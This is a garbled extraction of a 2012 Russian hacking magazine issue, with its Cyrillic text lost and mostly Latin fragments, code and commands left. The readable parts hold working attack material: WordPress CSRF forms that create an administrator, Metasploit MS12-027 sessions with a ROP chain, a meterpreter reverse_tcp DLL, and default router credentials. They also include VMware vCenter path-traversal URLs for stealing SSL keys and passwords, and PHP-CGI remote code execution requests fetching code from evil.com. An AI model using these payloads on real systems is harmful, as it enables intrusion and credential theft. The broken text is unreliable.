! ,
.
: 3000
. ,
!
Dropbox,
, Megaupload,
Hotfile
, ,
,
, .



,
,


( ). , .
,
. .
,

. , -,
( : --,
,
- ,
). -,
.

teamleada,
,
.
. ,
,
freelance.ru.
, : , , ,
,
.
1000 .
50 000 ,
242
T
( ).
. 10 ,

.
- ,
,

(
, 510 ,
- 100 ).

038

800 /,


,
.



:
1. .
DropArea,
.
,
( , ).
, ,
My files,
.
2. e-mail.
username@
upload.nekaka.com,
nekaka-.

e-mail.
,
, , - ,


.
.
3. torrent.
torrent,
,
,
.
- ,
.
, 10-
.
4. FTP.
e-mail,
,
. FTP-
.
.
, -

My Files Nekaka.
com, ,
.
.

?

SAMBA FTP
, ,
, .
,


.
Windows Mac OS X,
,
,


:). iOS Android.

must. 40%

. .
API,

.
,
, , , ,
. - Nekaka API,
.

, ,
- ,


.

1000 ,

07 /162/ 2012

. : ,

(
,

). ,


1000 , 20 .
20 ,
,
10 .
.
.
,


. ,
. :
. :
, 20
1000 . 1:20,
20/(1000/20) =
0,4 $.
400
. .
50
- 6 , 400
(20 6)/(1000/20)*1 000
000 = 280 .
1:50, 1:12, , ,
200 .
, . .
,
. ,
,

. , ,
-

07 /162/ 2012


,
.

. ,

. ,
. ,
,
megaupload.com
.

, .

.
:
filehosting.com,
nekaka.com
( API
).
, ,
, (
-).

, .
,
,
.

, , -10 Google
.
, .

.
400 ,
. ,
, , :).
,


.

,

,
.
300500 .
, ,
.


.
, , .
, ,
, , ,
, , .

-.
.
,
. ,
90% ,
600
. 98%
120 .
,
, ,
. ,
, .
,
! z

!
, , ,

nekaka.com/reg/x.
31.07.2012.

039

PC ZONE





.
,
.

Windows
:
CVS, SVN, Git, Mercurial.

, ,
, . ,
, ,
: project, project_old, project_olders...
project1, project1.1, project1.2. , ,
?
? , , -
. - , .
, . , ,
Word, ,
.
,
.

CVS
, ,

CVS.
C-
ACK (Amsterdam Compiler Kit)
cmt ( commit).
,
, ,
,
.

, CVS
2008 .
.
,
CVS. , ,
:

, ; -ASCII
;
;

.
,
CVS ,

.

040

TortoiseCVS

WinCVS

TORTOISECVS.ORG

CVSGUI.SOURCEFORGE.NET


CVS TortoiseCVS,
Windows,
CVS .
,
CVS CVS ( , ,
). , . TortoiseCVS
CVS
, GUI, cvs.exe
.

TortoiseCVS,
, WinCVS
.
CVS,

.
,
. WinCVS ,
CVS-.
diff- (
).
.
, .

07 /162/ 2012

Subversion (SVN)
Subversion , 2004 CollabNet
Inc. ,

CVS. SVN
CVS
. ,


. , SVN: Apache, GCC,
Free Pascal, Python, Ruby, FreeBSD, Haiku,
AROS MediaWiki. ,
,
Subversion
:

Subversion

,
;
.
1.5 ,
;

,
Subversion,
: ,

,
;
.svn
.
1.7
.svn, SQLite.

TortoiseSVN
TORTOISESVN.NET

,
Subversion- Windows. TortoiseCVS,
Windows. -
IDE, .
:
Subversion-;
IDE;
;
;
;
.

VisualSVN
WWW.VISUALSVN.COM

Subversion-
Visual Studio,
IDE.
Visual Studio 2005, 2008, 2010. TortoiseSVN:
, , Subversion, ,
. VisualSVN
, , ,
.

.
, .

07 /162/ 2012

DVD

041

PC ZONE

Git

,

Linux.
,
.
Git
. Git
,
. Darcs, BitKeeper, Mercurial,
Bazaar Monotone, Git
,
. Git
.
.
Git Git .

GIT ,
: LINUX, DRUPAL, CAIRO, GNU CORE
UTILITIES, MESA, WINE, CHROMIUM, COMPIZ
FUSION, FLIGHTGEAR, JQUERY, PHP


, Git
. :
;

VCS, CVS, SVN Mercurial;
, Git ;
- ;
Git
, rsync.

SmartGit

TortoiseGit

WWW.SYNTEVO.COM/SMARTGIT/INDEX.HTML

CODE.GOOGLE.COM/P/TORTOISEGIT

Git, Java.
Git, ,
GitHub. GitHub,
: Assembla, Beanstalk,
Codebase, Unfuddle.
:
, , .
diff-, ,
. -
Java,
. ,
, , , SmartGit .

Git Microsoft
Windows. ,
SVN TortoiseSVN
( Tortiose-
VCS), .
,
, .

MSysGit Git Windows,
TortoiseGit MSysGit
.

Git, TortoiseGit , .


:


Unicode Microsoft Windows;
SHA1,
;
/ , ;


.
,
Git
, :
Linux, Drupal, Cairo, GNU Core Utilities,
Mesa, Wine, Chromium, Compiz Fusion,
FlightGear, jQuery, PHP.

042

CVS2SVN
CVS SVN,
cvs2svn (cvs2svn.tigris.org). CVS
Subversion ( Git) ,
svnadmin. cvs2svn
, CVS: , ,
, , . ,
, , .

07 /162/ 2012

Mercurial (Hg)
Mercurial, Hg,
,

.
Python,

(, diff)
C.
Mercurial
Linux,
Windows, Mac OS
X UNIX-.

, Mercurial

(
),
(


),
( ).

TortoiseHg
(TORTOISEHG.BITBUCKET.ORG)

VisualHG
SHARESOURCE.ORG/
PROJECT/VISUALHG/

, ,

. VisualHG Visual Studio
(MSVS 2005, MSVS 2008 MSVS
2010), Mercurial-
IDE.
,
,

.
. VisualHG
.
VisualSVN,
,
, ,
Mercurial.

07 /162/ 2012


Mercurial. Windows .
.
TortoiseSVN TortioseGit,


. TortoiseHg
Mercurial, . ,
, .
Tortoise-, , ,
.





.

.
,

.
.
,

,

. z

043

/ EASY HACK

GreenDog , Digital Security (twitter.com/antyurin)

EASY
HACK
,
CURSORJACKING

, ui-redressing
clickjacking. , ,
HTML, CSS JavaScript, . - , - . ,
- ,
Facebook-
. .
. , frame-busting
(X-Frame-Options),
( ),
.
ui-redressing. , ,
. ,
. , .
.

.
(, , ) ,
. ,
, -,
,
(, Like).
, , ,
, ,
.
:
JavaScript .

044

, .
<style type="text/css">
#cursorjacking {
cursor:url("pointer2visible.png"),default;
}
#cursorjacking a {
cursor:url("pointer2visible.png"),default;
}
</style>
<div id="cursorjacking">
<a href="#" onClick="alert('Three');">Three</a>&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="#"
onClick="alert('Four');">Four</a>
</div>

cursorjacking
(Marcus Niemietz). CSS, . . .
, . (
, ) . ,
, .
, .
,
.

07 /162/ 2012

:).
Four
Three.
(Kotowicz), JS.
. -,
(style="cursor:none"). -, ( ),

. :

TRUE
FAKE
.

# :
<body style="cursor:none;height: 1000px;">
# ,
# " "
<img style="position: absolute;z-index:1000;"
id=cursor src="cursor.png" />
# ,
<button id=fake style="font-size: 150%;position:absolute;
top:100px;left:630px;">click me click me</button>
# ,
<div style="position:absolute;top:100px;left:30px;">
<a href="#" onclick="alert(/you clicked-me-instead/)">
i'm not important</a>
</div>
<script>
#
var oNode = document.getElementById('cursor');
#
var onmove = function (e) {
#
var nMoveX = e.clientX, nMoveY = e.clientY;
# ,
# 600
oNode.style.left = (nMoveX + 600)+"px";
oNode.style.top = nMoveY + "px";
};
#
document.body.addEventListener('mousemove',
onmove, true);

TRUE

FAKE

</script>
</body>

,

. ,
- 600
.
Twitter.
, . ,
FF Chrome. ,
( ),
. , ,
( ),
- .
: goo.gl/ME7fL, goo.gl/qAtQI.


.
, .
Wi-Fi- .
.
- :). Routerpwn
(routerpwn.com). .
,
MAC.
, - Routerpwn ,
-.

07 /162/ 2012

. -,
. :)
: ,
, IP , JavaScript URL.
,
.
Telnet D-Link DIR-300, :
login: Alphanetworks
password: wrgg19_c_dlwbr_dir300

045

/ EASY HACK

HTTPS-

. ,
- , . ,
-, .
,
, wireshark. ,
,
HTTP. .
SSL ,
.
, , !
SSL-
. ,

Burp ZAP. , .
, , ,
-, . ,
man-in-the-middle.
, , ,
, ,
. ,
Burp
.
1. Burp Internet Explorer.
2. https://google.com.
3. View.
4. Certificate Path
PortSwinger View.
5. Install .
, . -
, Dropbox .
? , -.
/ ,
.
, , easy ,
.

, Evernote

046

API
Monitor (www.rohitab.com). ,
API- ( - ),
. -
ProcMon ,
,
- .
. ,
, . .
. , Evernote. ,
,
HTTPS- IE Firefox. .
Evernote 32- API Monitor
( Evernote 32-). Evernote
. , API-
, ,
- ( IE FF ).
, , :).
API filter
, .
, .
Running Process evernote.exe,
Start Monitoring. , Evernote. API
Monitor . ,
, HEX buffer,
HTTP- Evernote.
, .
, Evernote :
, .
. ,
.

07 /162/ 2012


DLL-HIJACKING

-
,
Windows. ,
, , exe-
. -
,
.
. ,

,

DLL. DLL-hijacking , Windows
DLL .
:
1. , .
2. .
3. 16- .
4. Windows.
5. .
6. , .
,
DLL, .
,
.
PATH, , ,

. , PATH
, ,
, DLL.
, . -, PATH, . K,
. (-
) ,
(, - JAVA).
, .
. :
DLL-hijacking, PATH.
, ProcMon
. :

DLL-hijacking

1. contains- ProcMon:
Process name _;
Result Name not found;
Path PATH.
2. ( ):
wmic service _ call startservice

PATH DLL-hijacking. ,
. , .
, , , ,
. .
, DLL-hijacking
PATH .
.
, - .
, .
,
Metasploit meterpreter DLL-hijacking:
msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.0.1 D > dllname.dll

. !

,
(NTLM) :
- , ? , .
: - Ruby.
, .

07 /162/ 2012

, : -
, - , , , . ,
,
Burp ZAP owasp. .
Burp , .

047

(ivinside.blogspot.com)
(115612, . , . 1)

/
,
BSOD ,

.

CSRF WordPress

BRIEF
WordPress CMS,
. ross Site Request Forgery (
),
Ivano Binetti.

,

. -
antiCSRF (_wpnonce, _wpnonce_create-user,
_ajax_nonce, _wpnonce-custom-background-upload, _wpnonce-customheader-upload). ,
12 . ,

1, :

EXPLOIT

:
;
/;
/;
;
;
;
;
;
;
WordPress;
.

<html><body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change post title</H2>
<form method="POST" name="form0" action=
"http://<wordpress_ip>:80/wp-admin/admin-ajax.php">
<input type="hidden" name="post_title" value="hackedtitle"/>
<input type="hidden" name="post_name" value="hackedtitle"/>
<input type="hidden" name="mm" value="03"/>
<input type="hidden" name="jj" value="16"/>
<input type="hidden" name="aa" value="2012"/>
<input type="hidden" name="hh" value=""/>
<input type="hidden" name="mn" value=""/>
<input type="hidden" name="ss" value=""/>
<input type="hidden" name="post_author" value="1"/>
<input type="hidden" name="post_password" value=""/>

CVSSV2

6.0
(AV:N/AC:M/AU:S/C:P/I:P/A:P)

048

07 /162/ 2012

<input type="hidden" name="post_category%5B%5D" value="0"/>


<input type="hidden" name="post_category%5B%5D" value="1"/>
<input type="hidden" name="tax_input%5Bpost_tag%5D" value=""/>
<input type="hidden" name="comment_status" value="open"/>
<input type="hidden" name="ping_status" value="open"/>
<input type="hidden" name="_status" value="publish"/>
<input type="hidden" name="post_format" value="0"/>
<input type="hidden" name="_inline_edit"
value="<sniffed_value>"/>
<input type="hidden" name="post_view" value="list"/>
<input type="hidden" name="screen" value="edit-post"/>
<input type="hidden" name="action" value="inline-save"/>
<input type="hidden" name="post_type" value="post"/>
<input type="hidden" name="post_ID" value="1"/>
<input type="hidden" name="edit_date" value="true"/>
<input type="hidden" name="post_status" value="all"/>
</form></body></html>
<wordpress_ip> ,
.
admin2 password
:
<html><body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to add Administrator</H2>
<form method="POST" name="form0" action=
"http://<wordpress_ip>:80/wp-admin/user-new.php">
<input type="hidden" name="action" value="createuser"/>
<input type="hidden" name="_wpnonce_create-user"
value="<sniffed_value>"/>
<input type="hidden" name="_wp_http_referer" value=
"%2Fwordpress%2Fwp-admin%2Fuser-new.php"/>
<input type="hidden" name="user_login" value="admin2"/>
<input type="hidden" name="email" value="admin2@admin.com"/>
<input type="hidden" name="first_name"
value="admin2@admin.com"/>
<input type="hidden" name="last_name" value=""/>
<input type="hidden" name="url" value=""/>
<input type="hidden" name="pass1" value="password"/>
<input type="hidden" name="pass2" value="password"/>
<input type="hidden" name="role" value="administrator"/>
<input type="hidden" name="createuser" value="Add+New+User+"/>
</form></body></html>
TARGETS
WordPress 3.3.1 .
SOLUTION
WordPress .

7.5

(AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
(regexp),
. ,
Ruby,
- .
EXPLOIT
, ^ (
) $ ( ) Ruby -

07 /162/ 2012




, . , URL, :
javascript:alert(1);exploit_code();/*
http://hi.com
*/
URL,
JavaScript-.
, Ruby,
. ,
,
^ $. , 90%
- Ruby,
, github.com, soundcloud.com, tumblr.com . , .
TARGETS
- Ruby.
SOLUTION
\A \z ,
.

MS12-027
ActiveX-
MSCOMCTL

CVSSV2

BASE SCORE:9.3

(HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
ActiveX- ListView, ListView2,
TreeView TreeView2 MSCOMCTL.OCX -,
Office RTF-. ITW
.
EXPLOIT
ActiveX-,
RTF-.
RTF
, :

Ruby

CVSSV2

\n!
, :

{\object\objocx\objsetsize\objw3240\objh570{\*\objclass
MyControl.MControl}...
MS Office 2007:
msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof
msf exploit(ms12_027_mscomctl_bof) >
set payload windows/exec
payload => windows/exec
msf exploit(ms12_027_mscomctl_bof) > set cmd calc.exe
cmd => calc.exe
msf exploit(ms12_027_mscomctl_bof) > exploit
[*] Creating msf.doc file ...

049

/
[+] msf.doc stored at /home/pikofarad/.msf4/local/msf.doc
msf exploit(ms12_027_mscomctl_bof) >
MS Office 2010 metasploit msgr3en.dll,
ROP-. ROP- -, :).
wwlib.dll, MS Office. WinXP SP3, 2600. Word 2010,
Immunity Debugger.
mona.py,
corelanc0d3r ( Peter Van Eeckhoutte
). ImmDbg:
!mona rop -m wwlib
. . ROP- .
,
.
Log rop_chains.txt:
...
ROP Chain for VirtualAlloc() [(XP/2003 Server and up)] :
-------------------------------------------------------def create_rop_chain()
rop_gadgets =
[
0x3231e980, # POP ECX # RETN [wwlib.dll]
0x316d14ac, # ptr to &VirtualAlloc() [IAT wwlib.dll]
0x31735c11, # MOV ESI,DWORD PTR DS:[ECX]
# RETN [wwlib.dll]
0x31ae7361, # POP EBP # RETN [wwlib.dll]
0x31837b34, # & jmp esp [wwlib.dll]
0x3235b6b8, # POP EBX # RETN [wwlib.dll]
0x00000001, # 0x00000001-> ebx
0x31ac2bca, # POP EDX # RETN [wwlib.dll]
0x00001000, # 0x00001000-> edx
0x325950f3, # POP ECX # RETN [wwlib.dll]
0x00000040, # 0x00000040-> ecx
0x31f3ca18, # POP EDI # RETN [wwlib.dll]
0x32596c01, # RETN (ROP NOP) [wwlib.dll]
0x31e5d5a6, # POP EAX # RETN [wwlib.dll]
0x90909090, # nop
0x31f2f672, # PUSHAD # RETN [wwlib.dll]
# rop chain generated with mona.py
# note: this chain may not work out of the box
# you may have to change order or fix some gadgets,
# but it should give you a head start
].flatten.pack("V*")
return rop_gadgets
end
...

create_rop_chain
,
ROP-:
...
# winword.exe v14.0.6024.1000 (SP1)
[ 'Microsoft Office 2010 SP1 English on Windows [XP SP3 /
7 SP1] English',
{
'Ret' => 0x32596c01,
# retn # wwlib.dll <--
'Rop' => true,
'RopOffset' => 120
}
],
...
- .
target == 1, MS
Office 2010:
msf > use exploit/windows/fileformat/ms12_027_mscomctl_
bof_wwlib_rop
msf > set target 1
target => 1
msf exploit(ms12_027_mscomctl_bof_wwlib_rop) >
set payload windows/exec
payload => windows/exec
msf exploit(ms12_027_mscomctl_bof_wwlib_rop) >
set cmd calc.exe
cmd => calc.exe
msf exploit(ms12_027_mscomctl_bof_wwlib_rop) > exploit
[*] Creating msf.doc file ...
[+] msf.doc stored at /home/pikofarad/.msf4/local/msf.doc
msf exploit(ms12_027_mscomctl_bof_wwlib_rop) >
msf.doc ...
TARGETS
Microsoft Office 2003 SP3, 2007 SP2/SP3, 2010 Gold/SP1; Office 2003
Web Components SP3; SQL Server 2000 SP4, 2005 SP4 2008 SP2/SP3/R2;
BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, 2009
Gold/R2; Visual FoxPro 8.0 SP1 9.0 SP2; Visual Basic 6.0.
SOLUTION
, .

Microsoft Incremental Linker Integer Overflow

CVSSV2

BASE SCORE: 7.2

metasploit.
ms12_027_mscomctl_bof.rb
ms12_027_mscomctl_bof_wwlib_rop.rb.

(AV:L/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
Walied Assar Microsoft Visual Studio 2008,
-

XSS Github, Ruby

Ruby

050

07 /162/ 2012

ROP-, MS Office 2010

.

(link.exe) ,
COFF. ,
. ,

PE- dumpbin.exe
link.exe /dump.
EXPLOIT
- ,
COFF, , . ReadStringsAndSymbols
COFF
, PointerToSymbolTable NumberOfSymbols
IMAGE_FILE_HEADER .
typedef struct _IMAGE_FILE_HEADER {
WORD Machine;
WORD NumberOfSections;
DWORD TimeDateStamp;
DWORD PointerToSymbolTable;
DWORD NumberOfSymbols;
WORD SizeOfOptionalHeader;
WORD Characteristics;
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
ReadStringsAndSymbols:
int type;
wchar_t* actionName;
int magic2;
void ReadStringsAndSymbols(DUMPSTATE* pDump, int xx,
wchar_t* fileName) {
if (pDump->PointerToSymbolTable && pDump->NumberOfSymbols){
actionName = L"ReadStringsAndSymbols.LoadStrings";
int SymEntrySize = (type==2) ? 0x14 : 0x12;
LoadStrings(pDump, filename, SymEntrySize);
// ...
actionName = L"ReadStringsAndSymbols.ReadSymbolTable";
ReadSymbolTableEx(pDump, ...);
}
pDump->StringsNSymbols = 0;
return;
}

07 /162/ 2012

, MS Office 2007

, ReadStringsAndSymbols
LoadStrings ReadSymbolTableEx.
LoadStrings , .
,
PbMappedRegion , ,
. ReadSymbolTableEx
ReadSymbolTableT ,
.
ReadSymbolTableT ReadSymbolTableEx
:
void ReadSymbolTableEx(int A, int NumberOfSymbols) {
// ...
ReadSymbolTableT(...);
unsigned long size = (NumberOfSymbols*4) + NumberOfSymbols;
size += size;
size += size;
void *p = AllocBlk(size);
// ...
ConvertRgImgSymToRgImgSymEx(NumberOfSymbols, p);
}
AllocBlk, , ,
RtlAllocateHeap. :
0x400
, 0x400 . , NumberOfSymbols
0x8000000C,
0xf0 , , 0x400 .
,
ConvertRgImgSymToRgImgSymEx. ,
. ConvertRgImgSymToRgImgSymEx
, . , , ... , ,
.
TARGETS
Microsoft Visual Studio 2008, 9.00.21022.08, ,
.
SOLUTION
. : ! :) z

051

Ares (sniff.su)

SMBRELAY
WINDOWS 7
SMBRelay
MITM-,

.
, ,
, ?
,
,
.

SMBRelay

SMB?

SMBRELAY

, SMB (Server Message


Block). : ,
SMB.

, ,
.
1983
,
, SMBRelay.

,
SMB, ,
SMBRelay
.
, SMB
:

(share-level authentication). , ,

. -

052

,
.


- NTLM (
LM).
challenge,

.
,
Integrated Windows Authentication (IWA).

07 /162/ 2012

SMBRelay

NTLM- XP

MITM- Intercepter-NG

GUI Intercepter-NG

, -
Windows ,
, ,
,
. SMB-
,
,

. .

. challenge.
5.
challenge,
.
6. response
,
.
7. , ,
.


.

.

2008
,
.
Microsoft
,
.
( ) .

, !
2008 smbrelay3 Tarasco
Security,

.
SMB SMB, , HTTP/IMAP/
POP3/SMTP. NTLM.
:
smbrelay3 ,
cmd.exe,
/,
. Windows XP SP3
cmd.exe
( MS08-068
). XP
Windows 2003 ( ). Windows
XP ,

-,
, 445-
TCP- ( NetBios
139).

,
IP- .
(
, ). , :
1.
SMB-.
2. , .
3. , .
4. ,


,
SMBRelay, 2001 .
Sir Dystic
Cult Of The Dead Cow.

IP-.
smbrelay2,
NetBios-.
,
NTLM challenge+response
(, Cain & Abel).

MITM?

, Intercepter
!
(Windows, Linux, BSD),
Android iOS.
Windows-,
: ,
, ARP Poison.
Intercepter Console Edition :
GUI- Ncurses.
.

MITM- ( SMBRelay)
Intercepter-NG .
.
,
IP-. IP-
, .
Stealth IP-,
. IP-
IP , (
).

07 /162/ 2012

053



SMBRelay ,
Windows 7.

SMBRELAY VS WINDOWS 7

, Windows 7 LAN Manager
authentication level
Send NTLMv2 response only.
NTLM
response
NTLMv2 (

). ,
SMBRelay ( smbrelay3
Metasploit)
NTLMv2-.
, ,
. smbrelay3 NTLMv2
Windows 7 Windows XP.
. Windows 7,
IE,
Intranet. :

some_host IP- , , , Intranet
,
. IE

Automaticaly detect intranet network:

,

. , , Windows
7
.
,
Intranet Win7
SMBRelay, .

,
,
, , ,

. , .
SMBRelay SMB
Signing,
.

,
, , .
SMB Signing ,

.

IPC$ ADMIN$:
,

(C$...) . SMBRelay.

SMBRELAY
SMBRelay
Intercepter-NG,
NTLMv2
( smbrelay4).
, 445-
,
HTTP SMB.

NTLM-,

, - .

:
,

, ettercap -.
,
.
? ,
Arp Poison -
,
SMBRelay-.
,
. HTML, :
<!DOCTYPE...>
<meta name="keywords"...>
<meta name="description"...>.


:
<iframe src=http://ip__:
____smbrelay
width="0" height="0"></iframe>

, , NTLM
IE/Chrome, Firefox (,
, Opera)
.


.
,
,
. SMBRelay

SMB Signing EnableSecuritySignature,
RequireSecuritySignature. . z
WWW

LLMNR-

Windows . Vista
, LLMNR (Link Local Multicast Name Resolution).
DNS .
,
. , DNS NBNS (NetBIOS Name Service).
some_name,
LLMNR. ,
DNS. ,
NBNS. LLMNR, , ,
, , NBNS.
LLMNR- ,
(Vista/7/W2k8) (2k/XP/2k3),
, LLMNR. ,
.
, LLMNR , Network
Discovery .

Intercepter-NG

, Resurrection
Mode, .

.

,
,
HTTP/FTP/SMB/IMAP/
POP3/SMTP,
.
,


.

054

bit.ly/36cpY4
;
bit.ly/LwV62S

Intercepter.

WARNING

.



,


.

07 /162/ 2012

, Digital Security (twitter.com/asintsov)

VMware vCenter

, .
VMware vCenter.
,
.

VMWARE VCENTER

../../FILE.EXT

.
. !
VMware. ,
, ,
, .
VMware , .
, , VMware vCenter.
, , 10 VMware ESX(i).
50 . ,
vCenter. , vCenter
,
ESX . ,
. .
: vCenter .



, , .
, . : vCenter.
VMware. ,
- ( TCP- 9084) - Jetty
. :
http://target:9084/vci/download/health.xml/%3f/../../../../

056

: ,
. : ?
,
, (. ).
? , vSphere-
vCenter SOAP,
HTTPS-, XML- , .
SOAP-, cookie c PHPSESSIONID, :). , , , SOAP- vCenter
, -
( ).
Jetty-- SOAP-.
http://target:9084/vci/download/health.xml/%3f/../../../../
../../ProgramData\VMware\VMware VirtualCenter\Logs\vpxdprofiler-6.log

vSphere.
-,
vSphere,
add-on Metasploit VASTO. 2010
Black Hat 2010.
,
( ,
,
vCenter, ).
Google

07 /162/ 2012

VMware vCenter

vCenter. ,
, ( - 2011)
, ,
Jetty -.
-!


?
( ), ,
. ,
, . ,
, ,
. - Jetty,
.
15 .
:
http://target:9084/vci/download/.\..\..\..\..\..\..\..\..\
FILE.EXT

, MITM-
ARP-SPOOFING,
. , IP- - . , SSL- (cain
),
, SSL-.
, .
.

VMWARE VCENTER ORCHESTRATOR


-, SOAP-!

.
VMware,
. , ,
, ,
SSL. SSL- (whireshark
). :
http://target:9084/vci/downloads/.\..\..\..\..\..\..\..\
Documents and Settings\All Users\Application Data\VMware\
VMware VirtualCenter\SSL\rui.key

0(LD)-DAY VULNERABILITIES
,
vCenter,
20092010 :
bit.ly/K5HiP1 - ESX,
;
bit.ly/sVyRcA Jetty,
VMware vCenter;
bit.ly/KYwhAB
, ;
bit.ly/K98Vqy Virtual Appliance Management

.
,
VASTO.

07 /162/ 2012

Black Hat ;-)

vCenter ,
,
. ,
.
. .
, :
http://target:9084/vci/download/.\..\..\..\..\..\..\..\..\
Program files\VMware\Infrastructure\Orchestrator\
configuration\jetty\etc\passwd.properties

MD5-. ,
. ? MD5 . .
, . , , ,
. , ,
vCenter-,
,
.
HTML- , , , ,
, , .
, , ,
. :).
, ,
, , , , .

MOARRRRRR!
, , . ,
, .
, . , :

057

VASTO VS VCENTER
VASTO Metasploit VMware.
:
vmaware_login . , root,
wmware ( , ).
vmware_session_rider - vSphere,
SESSION_ID .
vmware_version VMware .
vmware_vilurker , MITM
, .
.

http://target:9084/vci/download/.\..\..\..\..\..\..\..\..\
Program Files\VMware\Infrastructure\Orchestrator\
app-server\server\vmo\conf\plugins\VC.xml

000a506275767b74786b383a4a60be767
864740329d5fcf324ec7fc98b1e0aaeef

( ):
- - . ,
, . , .
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<virtual-infrastructure-hosts>
<virtual-infrastructure-host
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:type="VirtualCenterHost">
<enabled>true</enabled>
<url>https://new-virtual-center-host:443/sdk</url>
<administrator-username>vmware</administrator-username>
<administrator-password>000a506275767b74786b383a4a60be76786
4740329d5fcf324ec7fc98b1e0aaeef </administrator-password>
<pattern>%u</pattern>
</virtual-infrastructure-host>
</virtual-infrastructure-hosts>

C:\Program Files\VMware\Infrastructure\
Orchestrator\app-server\server\vmo\conf\vmo.propirties.
.
, .
, CTF LeetMore .
:) ,
,
. Java- , ,
. : ,
, (
). , Password01. :

vCenter !

058

#
pass = "000a506275767b74786b383a4a60be767
864740329d5fcf324ec7fc98b1e0aaeef"
#
len = (pass[0..2]).to_i #
enc_pass = pass[3..-1].scan(/.{2}/)
# hex-
dec_pass = (0...len).collect do |i|
byte = enc_pass[i].to_i(16) # hex
byte -= i #
#
byte.chr
end
# : "Password01."
puts "Password: # {dec_pass.join()}"

, 0-

. vCenter.
, Metasploit.

, 0- , . , , ,
.
.
.
, ! z

vCenter

07 /162/ 2012

Raz0r (raz0r.name)

PHP-CGI
,
,
PHP
-.
PHP
.

PHP-,
.

PHP
PHP , .
, , PHP,
, PHP CGI. ,
.


2012 Eindbazen
Nullcon CTF, capture-the-flag. PHP, , . ,
Nullcon ,
0-day- PHP. Eindbazen
PHP . , . PHP
.
,
.
reddit.com -
PHP, .
,
PHP-,
CGI. Eindbazen ,
, .
,
,
PHP-. Eindbazen
, ,
advisory, , .

060

,
PHP CGI. PHP - Apache.
mod_php,

07 /162/ 2012

PHP:

CGI-. Apache , RFC:


.
PHP-CGI? .
2004 , , PHP, CGI-
:
if (getenv("SERVER_SOFTWARE")
|| getenv("SERVER_NAME")
|| getenv("GATEWAY_INTERFACE")
|| getenv("REQUEST_METHOD")) {
cgi = 1;
}
if(!cgi) getopt(...)

Options +ExecCGI
AddHandler cgi-script .php
Action cgi-script /path/to/php-cgi

.
,
, , ,
. , , -
CGI-. , , ,

-: CGI PHP stdin-,

,
-.
getopt(), , .
argc argv ,
main() . argv,
- ( - --),
. - -
STDIN CGI,
- .
, , ,
. PHP-CGI
.

Apache ,
- ,
mod_action.
-.

SCRIPT_FILENAME, ,
. ,
stdin.
, , , , stdout.
, , stdin .
, .
CGI , stdin,
-. , ?
, -
stdin.
CGI RFC, ,
? URI-, =, -
, + ( ) stdin

, .htaccess

PHP Apache
. CGI (Common
Gateway Interface). CGI , -,
.
CGI - ,
.
c Apache
: mod_php FastCGI.
, Apache PHP CGI -:

07 /162/ 2012

061

,
.

, php-cgi ,
, :
s ;
n php.ini;
T <n> n ;
d foo[=bar]
php.ini.
-r
PHP- ,
CGI- .
, ,
. , ,
.

BLACKBOX? NOPE!
.
http://site.com/index.php?-s, PHP
, .
,
.
,
. , , ,
. , ,

.

RCE
, , -r
? , PHP, auto_
prepend_file auto_append_file, .
PHP-,
, On -

allow_url_include, ,
URL. ,
Suhosin patch, PHP,
'-n'. PHP php.ini, ,
.
:
http://site.com/index.php?-n+-dallow_url_include%3DOn+dauto_prepend_file%3Dhttp://evil.com/code.txt


php://input,
POST-.
auto_prepend_file php://input,
. POST-
:
POST /index.php?-n+-dallow_url_include%3DOn+dauto_prepend_file%3Dphp%3a%2f%2finput HTTP/1.1
Host: site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Connection: close
<?php system("uname -a"); ?>



, / /proc/
self/environ. , ,
ProcFS,
. ,
: CGI HTTP-
. ProcFS *nix-,
FreeBSD, /proc/
self/environ . -

PHP-CGI
234 076
PHP-CGI


Apache- mod_security,

DreamHost.

WWW

INFO

bit.ly/IwDW8y

Eindbazen;
bit.ly/JuwsOR

PHP-CGI,

;
bit.ly/goqH0F
CGI RFC;
bit.ly/KsYavW


2004 .

FastCGI,
CGI,

/
stdin stdout

-
UNIX
TCP/IP.
FastCGI

.

062

07 /162/ 2012

PHP:

/proc/self/environ
auto_prepend_file , User-Agent:
GET /index.php?-n+-dallow_url_include%3DOn+dauto_prepend_file%3D%2fproc%2fself%2fenviron HTTP/1.1
Host: site.com
User-Agent: <?php system("id"); ?>
Connection: close


PHP .
,
, , ,
. :
if(*decoded_query_string == '-' &&
strchr(decoded_query_string, '=') == NULL) {
skip_getopt = 1;
}

:
=, PHP CGI. ,
. ,
, = URL-
(%3d). , , %3d,
: /?-s+%3d.
decoded_query_string
query_string, ,
. ,
php-cgi.
, DreamHost,
Nullcon CTF, :
#!/bin/sh
exec /dh/cgi-system/php5.cgi $*

, php5.cgi $* ,
, . , sh-
php-cgi /?+-s.
PHP . .htaccess :
RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? - [F,L]

-5 PHP

: bit.ly/MBmqSZ
: PHP < 4.3.8, PHP < 5.0.1
: , 2004

,
_. ,
.

ZEND_HASH_DEL_KEY_OR_INDEX
: bit.ly/doi4UA
: PHP < 4.4.3, PHP < 5.1.3
: , 2006
ZHDKOI-
, Joomla, phpBB, Wordpress vBulletin.
-,
.
, unset().

GPC- unset(),
/ .

PHP-

: bit.ly/3zpJMN
: PHP < 5.3
: USH, 2009

LFI- RFI-.
null-. ,
magic_quotes_gpc null- ,
LFI-RFI-.
;
,
MAXPATHLEN.


: bit.ly/KOzjVr
: PHP < 5.2.14, PHP < 5.3.3
: , 2010
, -

. , unserialize()
, , ,
. , -
Zend Framework
_SESSION,
PHP- ZF.


: =, , -
403 (Forbidden).

, PHP ,
-. ,
, PHP-CGI .
, ,
. z

07 /162/ 2012

: bit.ly/LbpQqH
: PHP 5.3.9
: , 2012
5.3.9 PHP
max_input_vars,
PHP Hash Collision DoS,
GPC-.
,
